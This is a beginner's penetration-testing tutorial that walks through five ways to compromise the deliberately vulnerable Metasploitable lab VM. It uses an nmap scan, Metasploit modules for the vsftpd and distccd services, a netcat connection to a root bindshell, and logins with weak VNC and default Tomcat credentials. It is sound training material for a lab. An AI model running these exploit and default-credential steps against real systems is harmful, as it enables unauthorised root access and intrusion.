Hi there!π
Today I'm going to show you how we can HACK Metasploitable virtual machine in 5 different ways to learn penetration testing with Nmap and Metasploit framework.
Let's get into it!
Before we get our hands dirty, we need to take some steps.
1. Install Kali Linux
For penetration testing or any cybersecurity activity it's better to have a Linux based operating system running on our systems.
If you don't have any Linux OS installed on your machine, You can install Kali Linux on a virtualbox like Oracle VM VirtualBox.
2. Install Metasploitable Virtual Machine
Let me introduce Metasploitable virtual machine to you.
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.
You can download metasploitable virtual machine and again install that on Oracle virtualbox.
3. Nmap And Metasploitable Framework
Nmap allows you to scan your network and discover not only everything connected to it, but also a wide variety of information about what's connected, what services each host is operating, and so on.
The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection.
By default Kali Linux has Nmap and metasploitable installed in it, but if you are using other Linux distro (e.g. Ubuntu) you need to install these packages.
REMEMBER
You should change network adapter for your Linux OSes (Kali & Metasploitable) on Bridge Adapter for their IPs to be in the same range as your device. (In Oracle go to Settings > Network > adapter 1)
Now, it's time for us to start hacking and get our hands dirty. π
Run both kali Linux and Metasploitable.
Then we should get the IP address of Metasploitable. Just type this command in metasploitable.
ifconfig
Then it shows some results containing the IP address. Mine is in eth0 192.168.1.3.
Now we should scan the target machine in Kali Linux using Nmap.
nmap -sV 192.168.1.3 -p-
Remember to write your own target machine IP in this command
-sV : This is a service version scan. In order to know what
exploits will work, it is very helpful to know the service
version behind an open port.
-p- : Scans all ports.
Then you'll see a result such as this:
As you might know the more open ports we have in a server, the less secure that server is. The reason is because the possibility of having vulnerable ports to exploit increases.
1. VSFTPD Open Port
I'll start with the first open port (port 21 vsftpd).
In your console, start the Metasploit framework by this command:
msfconsole
After metasploit started, type this:
search vsftpd
By this command we are searching for the service of the first open port that we've found.
Now you'll see a result like this:
As you see we found 1 excellent module to exploit this port.
Let's use it.
use 0
And now we should know what options should we pass to this module to work.
show options
As the result says we should only specify RHOST which is the IP of our target machine.
set RHOST <your-target-machine-IP>
Now we are ready to exploit the Metasploitable.
exploit
And BAM!!!
You can now run any command you want or do malicious things to the target machine.
2. Bindshell Open Port
Let's get into the second vulnerability which is very easy to detect.
Well This one is the most hilarious type of vulnerability that a machine can have which takes us straight to the root account and normally is very rare.
To do so, we use netcat.
nc <your-target-machine-IP> <port>
The port in this case is 1524.
And now we are the root account because of the stupid mistake of the admin.
3. DISTCCD Open Port
distccd service is another vulnerable port which is open.
search distccd
It gives us 1 module to use.
use 0
Again we have to specify the RHOST.
set RHOST <your-target-machine-IP>
Now type this:
show payloads
This command gives us every available command that we can use to exploit the target.
In this case we should use payload number 5.
set payload 5
Then exploit it.
exploit
And YEAH! we could exploit it for the 3rd time.π
4. VNC Open Port
Another important vulnerability in our Nmap scan is the port 5900 which belongs to VNC.
Exploiting this one is a little bit different but more interesting. π
Type this command:
vnc <your-target-machine-IP>
Now we should enter the passsword.
If we type msfadmin it throws an authentication failure.
But if we type password as the password we can access it because of its weak password.
5. Apache Vulnerability
In this item we're going to use Nmap script to find a vulnerability in Metasploitable Apache.
The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap.
We have different categories of NSE scripts such as auth, broadcast, brute, default. discovery, dos, exploit ...etc.
We are going to use auth.
nmap --script auth <your-target-machine-IP> -sV
If you scroll down, you'll see one of the auth vulnerabilities is for Apache at port 8180 which shows us the username and the password.
Simply type this URL in your browser:
<your-target-machine-IP>:8180/admin/
Then as our scan revealed, type tomcat as the username and the
password.
You are now logged in to the Apache server of the target. Congratulation!π₯³
Conclusion
Since Metasploitable is for learning penetration testing, you can find other vulnerabilities as well which if you are interested in, you may do just like what we did in this post.
Led me know if you found other vulnerabilities.π
Thanks!π€‘
Top comments (0)